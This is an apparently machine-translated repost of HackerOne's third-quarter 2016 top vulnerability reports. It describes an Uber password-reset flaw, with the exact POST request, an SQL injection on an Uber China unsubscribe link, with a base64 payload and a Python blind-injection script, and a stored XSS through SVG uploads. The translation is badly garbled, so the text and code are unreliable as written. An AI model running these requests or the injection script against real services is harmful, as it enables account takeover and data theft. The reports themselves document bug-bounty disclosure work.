HackerOne in the third quarter TOP 5 vulnerability report-vulnerability warning-the black bar safety net

2016-11-01T00:00:00
ID MYHACK58:62201680770
Type myhack58
Reporter 佚名
Modified 2016-11-01T00:00:00

Description

Foreword HackerOne in the third quarter TOP 5 vulnerability reports are coming announced. In this season, we participated in the Vegas hacker conference, hosted Hacked the World, and in the Reddit discussion above, some of the HackerOne problem. HackerOne vulnerability report from platform to establish a cumulative take to more than$10,000,000 reward, the most important thing: they help a lot the company found the following heavyweight vulnerability. These five vulnerability is not a rough assessment of the list, but after careful assessment, to ensure that the content is not repeated, and not simply the vulnerability summary. Details of vulnerability is most instructive, it is also we post out the reason. Vulnerability details One, Mongo in review Uber no password registration mechanism of the time to find a vulnerability. And then Uber in a day to repair the well, and in mongo to confirm the repair after he got 1 0,0 0 0 dollars. Uber for mongo represents a thousand thanks, we are very pleased at HackerOne can have Mongo such people. Mongo found the vulnerability as follows: Through a/rt/users/passwordless-signup can be changed to any Uber user's password, give any one the victim's phone number or by violence include the phone number, find already registered the user phone number. Mongo use their phone number to do the following test: POST /rt/users/passwordless-signup HTTP/1.1 Host: cn-geo1.uber.com User-Agent: client/iphone/2.137.1 Connection: close Content-Type: application/json Content-Length: 1 9 7 {"phoneNumberE164":"+xxxxxxxx","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}} The HTTP response message is as follows:

{"phoneNumberE164":"+xxxxxxxx","serverState":"SUCCEEDED","serverStateData":{"nextState":"SIGN_IN"},"tripVerifyStateData":{},"userMessage":"New password has been created. Please login with the new Password."," userRole":"client","userWorkflow":"PASSWORDLESS_SIGNUP"} Test steps: 1. The first registration of a passenger accounts IOS or Android clients can 2. As shown on the link initiates a POST request, wherein the phoneNumberE164 field that you want to modify the phone number plus the phone's area code, such as+1xxx is United States, and may need to be repeated two requests, and ultimately get the response: "the New password has been created", then this is the phone number of the password has been changed, is the POST submission when the newPassword field. 3. Use the new password in the http://riders. uber. com login or other device. Second, in this blog series of reports, only orange know to make travel gains maximized. In China this case, when the orange unsubscribe, find Uber. cn domain name of the presence of the SQL Injection vulnerability, this vulnerability report to win$4,000 dollars. Orange discovered vulnerabilities are as follows: When the orange travel in China with Uber, once he received a copy of Uber's advertising, and inside there is an unsubscribe link, but he found the unsubscribe connection and the original unsubscribe link is different, And the unsubscribe connection is the presence of SQL Injection that. The Payload is as follows:

http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ== Above this link have a database sleep 1 to 2 seconds. the p parameter is behind the base64, decoded as follows:

http://sctrack.email.uber.com.cn/track/unsubscribe.do?p={"user_id": "5 7 5 5 and sleep(1 2)=1", "receiver": "orange@mymail"} Then orange wrote a blind footnote The give database name and database user: import json import string import requests from urllib import quote from base64 import b64encode base = string. digits + '_-@.' payload = {"user_id": 5 7 5 5, "receiver": "blog. orange. tw"} for l in range(0, 3 0): for i in 'i'+base: payload['user_id'] = "5 7 5 5 and mid(user(),%d,1)='%c'#"%(l+1, i) new_payload = json. dumps(payload) new_payload = b64encode(new_payload) r = requests. get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload)) if len(r. content)>0: print i, break Finally get the mysql username sendcloud_w@10.9.79.210 the database sedncloud it. Third, Paragonie_Scott is HackerOne inside comparison superior team, in the analysis of this peculiar. svg reports of the time, to remind us. svg out of the ordinary. With other image formats as compared to clever. svg code structure can be performed. Adbullah received the Paragon project the most lucrative rewards, not to mention 3 5 0 0 page access. The vulnerabilities are as follows: Premise: the browser handles SVG files is very bad, if you want to handle the user upload the SVG file, you must ensure that the user is only allowed to use the Content-Type is text/plain. Background: Adbullah in ubuntu set the airship when the hit point issue, so he is the Paragon of the above test. If you upload any files-HTML, SWF, etc. to triggerXSS, eventually a Content-Type value will turn"text/palin;charset=us-ascii"to. For the picture, too, but if the uploaded format is SVG, but inside the content is JS, and ultimately allow the upload. So set the Content-Type,"Content-Type: images/svg+xml; charset=us-ascii", the attack can succeed, and stored to the user's account. !

[1] [2] [3] next